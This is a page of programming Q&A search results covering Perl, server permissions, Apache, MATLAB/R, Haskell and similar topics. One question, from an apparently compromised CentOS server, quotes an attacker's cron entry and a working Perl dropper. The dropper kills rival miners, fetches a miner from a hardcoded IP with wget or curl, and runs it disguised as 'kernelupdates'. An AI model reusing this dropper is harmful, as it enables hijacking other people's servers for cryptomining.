Search Results

Search found 3541 results on 142 pages for 'idiomatic perl'.

Page 117/142 | < Previous Page | 113 114 115 116 117 118 119 120 121 122 123 124  | Next Page >

  • Reading from a very large table using multiple threads (Java ) and writing them to a single file

    - by user2534926
    I am currently facing a situation where i have a table with almost 80 millions data and i have to take a dump of that table and store it into a csv file. Currently i am using a not so professional approach( with a perl script+DBI interface , printing the values to stdout and redirecting to a csv file). Now i am planning to use java threading approach. Can you suggest a way forward. Thanks in advance

    Read the article

  • How to setup linux permissions for the WWW folder?

    - by Xeoncross
    Updated Summery The /var/www directory is owned by root:root which means that no one can use it and it's entirely useless. Since we all want a web server that actually works (and no-one should be logging in as "root"), then we need to fix this. Only two entities need access. PHP/Perl/Ruby/Python all need access to the folders and files since they create many of them (i.e. /uploads/). These scripting languages should be running under nginx or apache (or even some other thing like FastCGI for PHP). The developers How do they get access? I know that someone, somewhere has done this before. With however-many billions of websites out there you would think that there would be more information on this topic. I know that 777 is full read/write/execute permission for owner/group/other. So this doesn't seem to be needed as it leaves random users full permissions. What permissions are need to be used on /var/www so that... Source control like git or svn Users in a group like "websites" (or even added to "www-data") Servers like apache or lighthttpd And PHP/Perl/Ruby can all read, create, and run files (and directories) there? If I'm correct, Ruby and PHP scripts are not "executed" directly - but passed to an interpreter. So there is no need for execute permission on files in /var/www...? Therefore, it seems like the correct permission would be chmod -R 1660 which would make all files shareable by these four entities all files non-executable by mistake block everyone else from the directory entirely set the permission mode to "sticky" for all future files Is this correct? Update: I just realized that files and directories might need different permissions - I was talking about files above so i'm not sure what the directory permissions would need to be. Update 2: The folder structure of /var/www changes drastically as one of the four entities above are always adding (and sometimes removing) folders and sub folders many levels deep. They also create and remove files that the other 3 entities might need read/write access to. Therefore, the permissions need to do the four things above for both files and directories. Since non of them should need execute permission (see question about ruby/php above) I would assume that rw-rw-r-- permission would be all that is needed and completely safe since these four entities are run by trusted personal (see #2) and all other users on the system only have read access. Update 3: This is for personal development machines and private company servers. No random "web customers" like a shared host. Update 4: This article by slicehost seems to be the best at explaining what is needed to setup permissions for your www folder. However, I'm not sure what user or group apache/nginx with PHP OR svn/git run as and how to change them. Update 5: I have (I think) finally found a way to get this all to work (answer below). However, I don't know if this is the correct and SECURE way to do this. Therefore I have started a bounty. The person that has the best method of securing and managing the www directory wins.

    Read the article

  • Recommendations for distributed processing/distributed storage systems

    - by Eddie
    At my organization we have a processing and storage system spread across two dozen linux machines that handles over a petabyte of data. The system right now is very ad-hoc; processing automation and data management is handled by a collection of large perl programs on independent machines. I am looking at distributed processing and storage systems to make it easier to maintain, evenly distribute load and data with replication, and grow in disk space and compute power. The system needs to be able to handle millions of files, varying in size between 50 megabytes to 50 gigabytes. Once created, the files will not be appended to, only replaced completely if need be. The files need to be accessible via HTTP for customer download. Right now, processing is automated by perl scripts (that I have complete control over) which call a series of other programs (that I don't have control over because they are closed source) that essentially transforms one data set into another. No data mining happening here. Here is a quick list of things I am looking for: Reliability: These data must be accessible over HTTP about 99% of the time so I need something that does data replication across the cluster. Scalability: I want to be able to add more processing power and storage easily and rebalance the data on across the cluster. Distributed processing: Easy and automatic job scheduling and load balancing that fits with processing workflow I briefly described above. Data location awareness: Not strictly required but desirable. Since data and processing will be on the same set of nodes I would like the job scheduler to schedule jobs on or close to the node that the data is actually on to cut down on network traffic. Here is what I've looked at so far: Storage Management: GlusterFS: Looks really nice and easy to use but doesn't seem to have a way to figure out what node(s) a file actually resides on to supply as a hint to the job scheduler. GPFS: Seems like the gold standard of clustered filesystems. Meets most of my requirements except, like glusterfs, data location awareness. Ceph: Seems way to immature right now. Distributed processing: Sun Grid Engine: I have a lot of experience with this and it's relatively easy to use (once it is configured properly that is). But Oracle got its icy grip around it and it no longer seems very desirable. Both: Hadoop/HDFS: At first glance it looked like hadoop was perfect for my situation. Distributed storage and job scheduling and it was the only thing I found that would give me the data location awareness that I wanted. But I don't like the namename being a single point of failure. Also, I'm not really sure if the MapReduce paradigm fits the type of processing workflow that I have. It seems like you need to write all your software specifically for MapReduce instead of just using Hadoop as a generic job scheduler. OpenStack: I've done some reading on this but I'm having trouble deciding if it fits well with my problem or not. Does anyone have opinions or recommendations for technologies that would fit my problem well? Any suggestions or advise would be greatly appreciated. Thanks!

    Read the article

  • How to setup linux permissions the WWW folder?

    - by Xeoncross
    Updated Summery The /var/www directory is owned by root:root which means that no one can use it and it's entirely useless. Since we all want a web server that actually works (and no-one should be logging in as "root"), then we need to fix this. Only two entities need access. PHP/Perl/Ruby/Python all need access to the folders and files since they create many of them (i.e. /uploads/). These scripting languages should be running under nginx or apache (or even some other thing like FastCGI for PHP). The developers How do they get access? I know that someone, somewhere has done this before. With however-many billions of websites out there you would think that there would be more information on this topic. I know that 777 is full read/write/execute permission for owner/group/other. So this doesn't seem to be needed as it leaves random users full permissions. What permissions are need to be used on /var/www so that... Source control like git or svn Users in a group like "websites" (or even added to "www-data") Servers like apache or lighthttpd And PHP/Perl/Ruby can all read, create, and run files (and directories) there? If I'm correct, Ruby and PHP scripts are not "executed" directly - but passed to an interpreter. So there is no need for execute permission on files in /var/www...? Therefore, it seems like the correct permission would be chmod -R 1660 which would make all files shareable by these four entities all files non-executable by mistake block everyone else from the directory entirely set the permission mode to "sticky" for all future files Is this correct? Update: I just realized that files and directories might need different permissions - I was talking about files above so i'm not sure what the directory permissions would need to be. Update 2: The folder structure of /var/www changes drastically as one of the four entities above are always adding (and sometimes removing) folders and sub folders many levels deep. They also create and remove files that the other 3 entities might need read/write access to. Therefore, the permissions need to do the four things above for both files and directories. Since non of them should need execute permission (see question about ruby/php above) I would assume that rw-rw-r-- permission would be all that is needed and completely safe since these four entities are run by trusted personal (see #2) and all other users on the system only have read access. Update 3: This is for personal development machines and private company servers. No random "web customers" like a shared host. Update 4: This article by slicehost seems to be the best at explaining what is needed to setup permissions for your www folder. However, I'm not sure what user or group apache/nginx with PHP OR svn/git run as and how to change them. Update 5: I have (I think) finally found a way to get this all to work (answer below). However, I don't know if this is the correct and SECURE way to do this. Therefore I have started a bounty. The person that has the best method of securing and managing the www directory wins.

    Read the article

  • Why are my httpd mpm_prefork processes being reaped so quickly?

    - by Dan Pritts
    We've got a system running RHEL6, x64. We are using a local installation of apache 2.2.22 from source. we serve primarily: mod_perl applications (with a local installation of perl 5.16.0) tomcat applications proxied with mod_jk Here is some context; the main question is below. All of this talks to an Oracle backend. We are having issues with Oracle becoming unresponsive. We think this is because we're hitting the maximum process limit in oracle. We've upped the process limit, but now we are hitting memory pressure on the oracle server. We have tons of oracle sessions sitting idle. I can trace a bunch of them back to the httpd processes. We have mod_perl's Apache::DBI start up a new connection to the database with each httpd child that's spawned. We are concerned that these are not always getting closed out properly when the httpd's exit...and the httpd's are exiting very frequently. I know that it would be good to modify the mod_perl applications to use some better form of db connection pooling; we plan to pursue that but would like to solve our immediate problem sooner. So here's the main question. We are using the prefork MPM. The apache child processes are lasting at most a few minutes. Log analysis shows that each one is serving fewer than 50 clients before exiting; the last request each child serves is OPTIONS * HTTP/1.0 on some sort of internal connection; I'm under the impression that this is a "ping" from the master process. I've adjusted the MPM config as follows. I didn't want to raise MinSpareServers too high, because, after all, i'm trying to minimize the number of sessions to oracle. MinSpareServers 5 MaxSpareServers 30 MaxClients 150 MaxRequestsPerChild 10000 Right now we're serving 250-300 requests per minute. We've got 21 httpd's running, the eldest (other than the master, owned by root) being 3 minutes old. This rate of reaping of the apache children really seems excessive. What could be causing it? Apache was built with: $ ./configure --prefix=/opt/apache --with-ssl=/usr/lib --enable-expires --enable-ext-filter --enable-info --enable-mime-magic --enable-rewrite --enable-so --enable-speling --enable-ssl --enable-usertrack --enable-proxy --enable-headers --enable-log-forensic Apache config info: % /opt/apache/bin/httpd -V Server version: Apache/2.2.22 (Unix) Server built: Jul 23 2012 22:30:13 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.5, APR-Util 1.4.1 Compiled using: APR 1.4.5, APR-Util 1.4.1 Architecture: 64-bit Server MPM: Prefork threaded: no forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/prefork" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/opt/apache" -D SUEXEC_BIN="/opt/apache/bin/suexec" -D DEFAULT_PIDLOG="logs/httpd.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_LOCKFILE="logs/accept.lock" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="conf/mime.types" -D SERVER_CONFIG_FILE="conf/httpd.conf" modules are compiled into apache rather than shared libs: % /opt/apache/bin/httpd -l Compiled in modules: core.c mod_authn_file.c mod_authn_default.c mod_authz_host.c mod_authz_groupfile.c mod_authz_user.c mod_authz_default.c mod_auth_basic.c mod_ext_filter.c mod_include.c mod_filter.c mod_log_config.c mod_log_forensic.c mod_env.c mod_mime_magic.c mod_expires.c mod_headers.c mod_usertrack.c mod_setenvif.c mod_version.c mod_proxy.c mod_proxy_connect.c mod_proxy_ftp.c mod_proxy_http.c mod_proxy_scgi.c mod_proxy_ajp.c mod_proxy_balancer.c mod_ssl.c prefork.c http_core.c mod_mime.c mod_status.c mod_autoindex.c mod_asis.c mod_info.c mod_cgi.c mod_negotiation.c mod_dir.c mod_actions.c mod_speling.c mod_userdir.c mod_alias.c mod_rewrite.c mod_so.c One final note - the red hat httpd, apr, and perl packages are all installed, but ldd shows that none of those libraries are linked with the running httpd.

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • Surviving MATLAB and R as a Hardcore Programmer

    - by dsimcha
    I love programming in languages that seem geared towards hardcore programmers. (My favorites are Python and D.) MATLAB is geared towards engineers and R is geared towards statisticians, and it seems like these languages were designed by people who aren't hardcore programmers and don't think like hardcore programmers. I always find them somewhat awkward to use, and to some extent I can't put my finger on why. Here are some issues I have managed to identify: (Both): The extreme emphasis on vectors and matrices to the extent that there are no true primitives. (Both): The difficulty of basic string manipulation. (Both): Lack of or awkwardness in support for basic data structures like hash tables and "real", i.e. type-parametric and nestable, arrays. (Both): They're really, really slow even by interpreted language standards, unless you bend over backwards to vectorize your code. (Both): They seem to not be designed to interact with the outside world. For example, both are fairly bulky programs that take a while to launch and seem to not be designed to make simple text filter programs easy to write. Furthermore, the lack of good string processing makes file I/O in anything but very standard forms near impossible. (Both): Object orientation seems to have a very bolted-on feel. Yes, you can do it, but it doesn't feel much more idiomatic than OO in C. (Both): No obvious, simple way to get a reference type. No pointers or class references. For example, I have no idea how you roll your own linked list in either of these languages. (MATLAB): You can't put multiple top level functions in a single file, encouraging very long functions and cut-and-paste coding. (MATLAB): Integers apparently don't exist as a first class type. (R): The basic builtin data structures seem way too high level and poorly documented, and never seem to do quite what I expect given my experience with similar but lower level data structures. (R): The documentation is spread all over the place and virtually impossible to browse or search. Even D, which is often knocked for bad documentation and is still fairly alpha-ish, is substantially better as far as I can tell. (R): At least as far as I'm aware, there's no good IDE for it. Again, even D, a fairly alpha-ish language with a small community, does better. In general, I also feel like MATLAB and R could be easily replaced by plain old libraries in more general-purpose langauges, if sufficiently comprehensive libraries existed. This is especially true in newer general purpose languages that include lots of features for library writers. Why do R and MATLAB seem so weird to me? Are there any other major issues that you've noticed that may make these languages come off as strange to hardcore programmers? When their use is necessary, what are some good survival tips? Edit: I'm seeing one issue from some of the answers I've gotten. I have a strong personal preference, when I analyze data, to have one script that incorporates the whole pipeline. This implies that a general purpose language needs to be used. I hate having to write a script to "clean up" the data and spit it out, then another to read it back in a completely different environment, etc. I find the friction of using MATLAB/R for some of my work and a completely different language with a completely different address space and way of thinking for the rest to be a huge source of friction. Furthermore, I know there are glue layers that exist, but they always seem to be horribly complicated and a source of friction.

    Read the article

  • Educational, well-written FOSS projects to read, study or discuss

    - by Godot
    Before you say it: yes, this "question" has been asked other times. However, I could not fine many of such questions and not that easily, and those I found had similar results. What I'm trying to say that there are no comprehensive lists of well written Open Source projects, so I decided to set some requirements for the entries (one or possibly more): Idiomatic use of the language in which they are written The project should be lightweight. Not as in "a few kbs", as in "clean" and possibly following the UNIX philosophy, making an efficient use of resources and performing its duty and nothing more. No code bloat, most importantly. Projects like Firefox and GNOME wouldn't qualify, for example. Minimal reliance on external, non-standard libraries, with exceptions for some common FOSS libraries (curses, Xlib, OpenGL and possibly "usual suspects" like gtk+, webkit and Boost). Reliance on well-written libraries is welcome. No reliance on proprietary software - for obvious reasons (programs that rely on XNA, DirectX, Cocoa and similar, for example). Well-documented code is welcome. Include link to web interfaces to their repositories if possible. Here are some sample projects that often pop up in these threads: Operating Systems Plan 9 from Bell Labs: More or less, the official "sequel" to UNIX. Written in C by the same people who invented C! NetBSD: The most portable BSD implementation, written in C and also a good example of portable and organized code. Network and Databases Sqlite: Extremely lightweight and extremely efficient, one of the best pieces of C software I've seen. Count the lines yourself! Lighttpd: A small but pretty reliable web server written in C. Programming languages and VMs Lua: extremely lightweight multi-paradigm programming language. Written in C. Tiny C Compiler: Really tiny C compiler. Not really comparable to GCC or Clang but does its job. PyPy: A Python implementation written in Python. Pharo: OK, I admit it, I'm not really a Smalltalk expert but Pharo is a fork of Squeak and looked rather interesting. Stackless Python - An implementation of Python that doesn't rely on the C call stack - written in C (with some parts in Python) Games and 3D: Angband: One of the most accessible roguelike codebases around here, written in C. Ogre3D: Cross-platform 3D engine. Gets bloated if you don't skip the platform-specific implementation code, otherwise is a pretty solid example of good C++ OO. Simon Tatham's Portable Puzzle Collection: Title says it all. Other - dwm: Lightweight window manager. Written in C. Emulation and Reverse Engineering - Bochs: x86 emulator, written in C++ and tiny enough. - MAME: If you want to see C at one of its lowest levels, MAME is for you. May not be as clean as the other projects but it can teach you A LOT. Before you ask: I didn't mention Linux because it has become quite bloated in the last few years, Linus has also confirmed it. Nonetheless, it'd be a great educational read the same, even if for other reasons. Same for GCC. Feel free to edit or wikify my post. I hope you won't lock my question, I'm only trying to organize a little community effort for the good of all those people who want to enhance their coding skills.

    Read the article

  • Suggestions for doing async I/O with Task Parallel Library

    - by anelson
    I have some high performance file transfer code which I wrote in C# using the Async Programming Model (APM) idiom (eg, BeginRead/EndRead). This code reads a file from a local disk and writes it to a socket. For best performance on modern hardware, it's important to keep more than one outstanding I/O operation in flight whenever possible. Thus, I post several BeginRead operations on the file, then when one completes, I call a BeginSend on the socket, and when that completes I do another BeginRead on the file. The details are a bit more complicated than that but at the high level that's the idea. I've got the APM-based code working, but it's very hard to follow and probably has subtle concurrency bugs. I'd love to use TPL for this instead. I figured Task.Factory.FromAsync would just about do it, but there's a catch. All of the I/O samples I've seen (most particularly the StreamExtensions class in the Parallel Extensions Extras) assume one read followed by one write. This won't perform the way I need. I can't use something simple like Parallel.ForEach or the Extras extension Task.Factory.Iterate because the async I/O tasks don't spend much time on a worker thread, so Parallel just starts up another task, resulting in potentially dozens or hundreds of pending I/O operations; way too much! You can work around that by Waiting on your tasks, but that causes creation of an event handle (a kernel object), and a blocking wait on a task wait handle, which ties up a worker thread. My APM-based implementation avoids both of those things. I've been playing around with different ways to keep multiple read/write operations in flight, and I've managed to do so using continuations that call a method that creates another task, but it feels awkward, and definitely doesn't feel like idiomatic TPL. Has anyone else grappled with an issue like this with the TPL? Any suggestions?

    Read the article

  • How to Global onRouteRequest directly to onBadRequest?

    - by virtualeyes
    EDIT Came up with this to sanitize URI date params prior to passing off to Play router val ymdMatcher = "\\d{8}".r // matcher for yyyyMMdd URI param val ymdFormat = org.joda.time.format.DateTimeFormat.forPattern("yyyyMMdd") def ymd2Date(ymd: String) = ymdFormat.parseDateTime(ymd) override def onRouteRequest(r: RequestHeader): Option[Handler] = { import play.api.i18n.Messages ymdMatcher.findFirstIn(r.uri) map{ ymd=> try { ymd2Date( ymd); super.onRouteRequest(r) } catch { case e:Exception => // kick to "bad" action handler on invalid date Some(controllers.Application.bad(Messages("bad.date.format"))) } } getOrElse(super.onRouteRequest(r)) } ORIGINAL Let's say I want to return a BadRequest result type for all /foo URIs: override def onBadRequest(r: RequestHeader, error: String) = { BadRequest("Bad Request: " + error) } override def onRouteRequest(r: RequestHeader): Option[Handler] = { if(r.uri.startsWith("/foo") onBadRequest("go away") else super.onRouteRequest(r) } Of course does not work, since the expected return type is Option[play.api.mvc.Handler] What's the idiomatic way to deal with this, create a default Application controller method to handle filtered bad requests? Ideally, since I know in onRouteRequest that /foo is in fact a BadRequest, I'd like to call onBadRequest directly. Should note that this is a contrived example, am actually verifying a URI yyyyMMdd date param, and BadRequest-ing if it does not parse to a JodaTime instance -- basically a catch-all filter to sanitize a given date param rather than handling on every single controller method call, not to mention, avoiding cluttering up application log with useless stack traces re: invalid date parse conversions (have several MBs of these junk trace entries accruing daily due to users pointlessly manipulating the uri date in attempts to get at paid subscriber content)

    Read the article

  • Ruby - Immutable Objects

    - by Chris Bunch
    I've got a highly multithreaded app written in Ruby that shares a few instance variables. Writes to these variables are rare (1%) while reads are very common (99%). What is the best way (either in your opinion or in the idiomatic Ruby fashion) to ensure that these threads always see the most up-to-date values involved? Here's some ideas so far that I had (although I'd like your input before I overhaul this): Have a lock that most be used before reading or writing any of these variables (from Java Concurrency in Practice). The downside of this is that it puts a lot of synchronize blocks in my code and I don't see an easy way to avoid it. Use Ruby's freeze method (see here), although it looks equally cumbersome and doesn't give me any of the synchronization benefits that the first option gives. These options both seem pretty similar but hopefully anyone out there will have a better idea (or can argue well for one of these ideas). I'd also be fine with making the objects immutable so they aren't corrupted or altered in the middle of an operation, but I don't know Ruby well enough to make the call on my own and this question seems to argue that objects are highly mutable.

    Read the article

  • Excel Regex, or export to Python? ; "Vlookup" in Python?

    - by victorhooi
    heya, We have an Excel file with a worksheet containing people records. 1. Phone Number Sanitation One of the fields is a phone number field, which contains phone numbers in the format e.g.: +XX(Y)ZZZZ-ZZZZ (where X, Y and Z are integers). There are also some records which have less digits, e.g.: +XX(Y)ZZZ-ZZZZ And others with really screwed up formats: +XX(Y)ZZZZ-ZZZZ / ZZZZ or: ZZZZZZZZ We need to sanitise these all into the format: 0YZZZZZZZZ (or OYZZZZZZ with those with less digits). 2. Fill in Supervisor Details Each person also has a supervisor, given as an numeric ID. We need to do a lookup to get the name and email address of that supervisor, and add it to the line. This lookup will be firstly on the same worksheet (i.e. searching itself), and it can then fallback to another workbook with more people. 3. Approach? For the first issue, I was thinking of using regex in Excel/VBA somehow, to do the parsing. My Excel-fu isn't the best, but I suppose I can learn...lol. Any particular points on this one? However, would I be better off exporting the XLS to a CSV (e.g. using xlrd), then using Python to fix up the phone numbers? For the second approach, I was thinking of just using vlookups in Excel, to pull in the data, and somehow, having it fall through, first on searching itself, then on the external workbook, then just putting in error text. Not sure how to do that last part. However, if I do happen to choose to export to CSV and do it in Python, what's an efficient way of doing the vlookup? (Should I convert to a dict, or just iterate? Or is there a better, or more idiomatic way?) Cheers, Victor

    Read the article

  • Django model operating on a queryset

    - by jmoz
    I'm new to Django and somewhat to Python as well. I'm trying to find the idiomatic way to loop over a queryset and set a variable on each model. Basically my model depends on a value from an api, and a model method must multiply one of it's attribs by this api value to get an up-to-date correct value. At the moment I am doing it in the view and it works, but I'm not sure it's the correct way to achieve what I want. I have to replicate this looping elsewhere. Is there a way I can encapsulate the looping logic into a queryset method so it can be used in multiple places? I have this atm (I am using django-rest-framework): class FooViewSet(viewsets.ModelViewSet): model = Foo serializer_class = FooSerializer bar = # some call to an api def get_queryset(self): # Dynamically set the bar variable on each instance! foos = Foo.objects.filter(baz__pk=1).order_by('date') for item in foos: item.needs_bar = self.bar return items I would think something like so would be better: def get_queryset(self): bar = # some call to an api # Dynamically set the bar variable on each instance! return Foo.objects.filter(baz__pk=1).order_by('date').set_bar(bar) I'm thinking the api hit should be in the controller and then injected to instances of the model, but I'm not sure how you do this. I've been looking around querysets and managers but still can't figure it out nor decided if it's the best method to achieve what I want. Can anyone suggest the correct way to model this with django? Thanks.

    Read the article

  • How to mimic built-in .NET serialization idioms?

    - by Matt Enright
    I have a library (written in C#) for which I need to read/write representations of my objects to disk (or to any Stream) in a particular binary format (to ensure compatibility with C/Java library implementations). The format requires a fair amount of bit-packing and some DEFLATE'd bytestreams. I would like my library, however, to be as idiomatic .NET as possible, however, and so would like to provide an API as close as possible to the normal binary serialization process. I'm aware of the ability to implement the IFormatter interface, but being that I really am unable to reuse any part of the built-in serialization stack, is it worth doing this, or will it just bring unnecessary overhead. In other words: Implement IFormatter and co. OR Just provide "Serialize"/"Deserialize" methods that act on a Stream? A good point brought up below about needing the serialization semantics for any case involving Remoting. In a case where using MarshalByRef objects is feasible, I'm pretty sure that this won't be an issue, so leaving that aside are there any benefits or drawbacks to using the ISerializable/IFormatter versus a custom stack (or, is my understanding remoting incorrectly)?

    Read the article

  • Haskell math performance

    - by Travis Brown
    I'm in the middle of porting David Blei's original C implementation of Latent Dirichlet Allocation to Haskell, and I'm trying to decide whether to leave some of the low-level stuff in C. The following function is one example—it's an approximation of the second derivative of lgamma: double trigamma(double x) { double p; int i; x=x+6; p=1/(x*x); p=(((((0.075757575757576*p-0.033333333333333)*p+0.0238095238095238) *p-0.033333333333333)*p+0.166666666666667)*p+1)/x+0.5*p; for (i=0; i<6 ;i++) { x=x-1; p=1/(x*x)+p; } return(p); } I've translated this into more or less idiomatic Haskell as follows: trigamma :: Double -> Double trigamma x = snd $ last $ take 7 $ iterate next (x' - 1, p') where x' = x + 6 p = 1 / x' ^ 2 p' = p / 2 + c / x' c = foldr1 (\a b -> (a + b * p)) [1, 1/6, -1/30, 1/42, -1/30, 5/66] next (x, p) = (x - 1, 1 / x ^ 2 + p) The problem is that when I run both through Criterion, my Haskell version is six or seven times slower (I'm compiling with -O2 on GHC 6.12.1). Some similar functions are even worse. I know practically nothing about Haskell performance, and I'm not terribly interested in digging through Core or anything like that, since I can always just call the handful of math-intensive C functions through FFI. But I'm curious about whether there's low-hanging fruit that I'm missing—some kind of extension or library or annotation that I could use to speed up this numeric stuff without making it too ugly.

    Read the article

  • Appending and prepending to XML files with Clojure

    - by Isaac Copper
    I have an XML file with format similar to: <root> <baby> <a>stuff</a> <b>stuff</b> <c>stuff</c> </baby> ... <baby> <a>stuff</a> <b>stuff</b> <c>stuff</c> </baby> </root> And a Clojure hash-map similar to: {:a "More stuff" :b "Some other stuff" :c "Yet more of that stuff"} And I'd like to prepend XML (¶) created from this hash-map after the <root> tag and before the first <baby> (¶) The XML to prepend would be like: <baby> <a>More stuff</a> <b>Some other stuff</b> <c>Yet more of that stuff</c> </baby> I'd also like to be able to delete the last one (or n...) <baby>...</baby>s from the file. I'm struggling with coming up with an idiomatic was to prepend and append this data. I can do raw string manipulations, or parse the XML using xml/parse and xml-seq and then roll through the nodes and (somehow?) replace the data there, but that seems messy. Any tips? Ideas? Hints? Pointers? They'd all be much appreciated. Thank you!

    Read the article

  • Reuse, Rewrite, or Refactor?

    - by Jon Purdy
    At work I inherited development of a PHP-based Web site after the consultant who originally produced it bailed out and left without a trace. Literally half of the code is ripped from online tutorials, and there are thousands of lines of cruft that, being incomplete, do precious little. Hardly any of it actually works. I've been trying to pull out the usable components, such as the layout (cleverly intermixed with code), session management (delicately seasoned with unescaped, unvalidated SQL queries), and a few other things, but it's very difficult to force all of this junk into place. Further, I don't speak idiomatic PHP, being more of a Perl user, and I'm supposed to be on this project principally for maintenance, so rewriting everything seems like it would take just as long as wrestling the existing monster back into place. As an aside, I have literally never seen anything as badly written as this. Welcome me to the world of working with other people's code, I guess, but I do hope it's not this common in the real world to have such gems as these: // WHY IS THIS NOT WORKING // I know this is bad but were going for working stuff right now... // This is a PHP code outputing Javascript code outputting HTML...do not go further // Not userful I'm looking for the best advice I can get here. What would you do if you were in my position?

    Read the article

  • How can I generate the Rowland prime sequence idiomatically in J?

    - by Gregory Higley
    If you're not familiar with the Rowland prime sequence, you can find out about it here. I've created an ugly, procedural monadic verb in J to generate the first n terms in this sequence, as follows: rowland =: monad define result =. 0 $ 0 t =. 1 $ 7 while. (# result) < y do. a =. {: t n =. 1 + # t t =. t , a + n +. a d =. | -/ _2 {. t if. d > 1 do. result =. ~. result , d end. end. result ) This works perfectly, and it indeed generates the first n terms in the sequence. (By n terms, I mean the first n distinct primes.) Here is the output of rowland 20: 5 3 11 23 47 101 7 13 233 467 941 1889 3779 7559 15131 53 30323 60647 121403 242807 My question is, how can I write this in more idiomatic J? I don't have a clue, although I did write the following function to find the differences between each successive number in a list of numbers, which is one of the required steps. Here it is, although it too could probably be refactored by a more experienced J programmer than I: diffs =: monad : '}: (|@({.-2&{.) , $:@}.) ^: (1 < #) y'

    Read the article

  • Java try finally variations

    - by Petr Gladkikh
    This question nags me for a while but I did not found complete answer to it yet (e.g. this one is for C# http://stackoverflow.com/questions/463029/initializing-disposable-resources-outside-or-inside-try-finally). Consider two following Java code fragments: Closeable in = new FileInputStream("data.txt"); try { doSomething(in); } finally { in.close(); } and second variation Closeable in = null; try { in = new FileInputStream("data.txt"); doSomething(in); } finally { if (null != in) in.close(); } The part that worries me is that the thread might be somewhat interrupted between the moment resource is acquired (e.g. file is opened) but resulting value is not assigned to respective local variable. Is there any other scenarios the thread might be interrupted in the point above other than: InterruptedException (e.g. via Thread#interrupt()) or OutOfMemoryError exception is thrown JVM exits (e.g. via kill, System.exit()) Hardware fail (or bug in JVM for complete list :) I have read that second approach is somewhat more "idiomatic" but IMO in the scenario above there's no difference and in all other scenarios they are equal. So the question: What are the differences between the two? Which should I prefer if I do concerned about freeing resources (especially in heavily multi-threading applications)? Why? I would appreciate if anyone points me to parts of Java/JVM specs that support the answers.

    Read the article

  • Indenting Paragraph With cout

    - by Eric
    Given a string of unknown length, how can you output it using cout so that the entire string displays as an indented block of text on the console? (so that even if the string wraps to a new line, the second line would have the same level of indentation) Example: cout << "This is a short string that isn't indented." << endl; cout << /* Indenting Magic */ << "This is a very long string that will wrap to the next line because it is a very long string that will wrap to the next line..." << endl; And the desired output: This is a short string that isn't indented. This is a very long string that will wrap to the next line because it is a very long string that will wrap to the next line... Edit: The homework assignment I'm working on is complete. The assignment has nothing to do with getting the output to format as in the above example, so I probably shouldn't have included the homework tag. This is just for my own enlightment. I know I could count through the characters in the string, see when I get to the end of a line, then spit out a newline and output -x- number of spaces each time. I'm interested to know if there is a simpler, idiomatic C++ way to accomplish the above.

    Read the article

  • Trouble with building up a string in Clojure

    - by Aki Iskandar
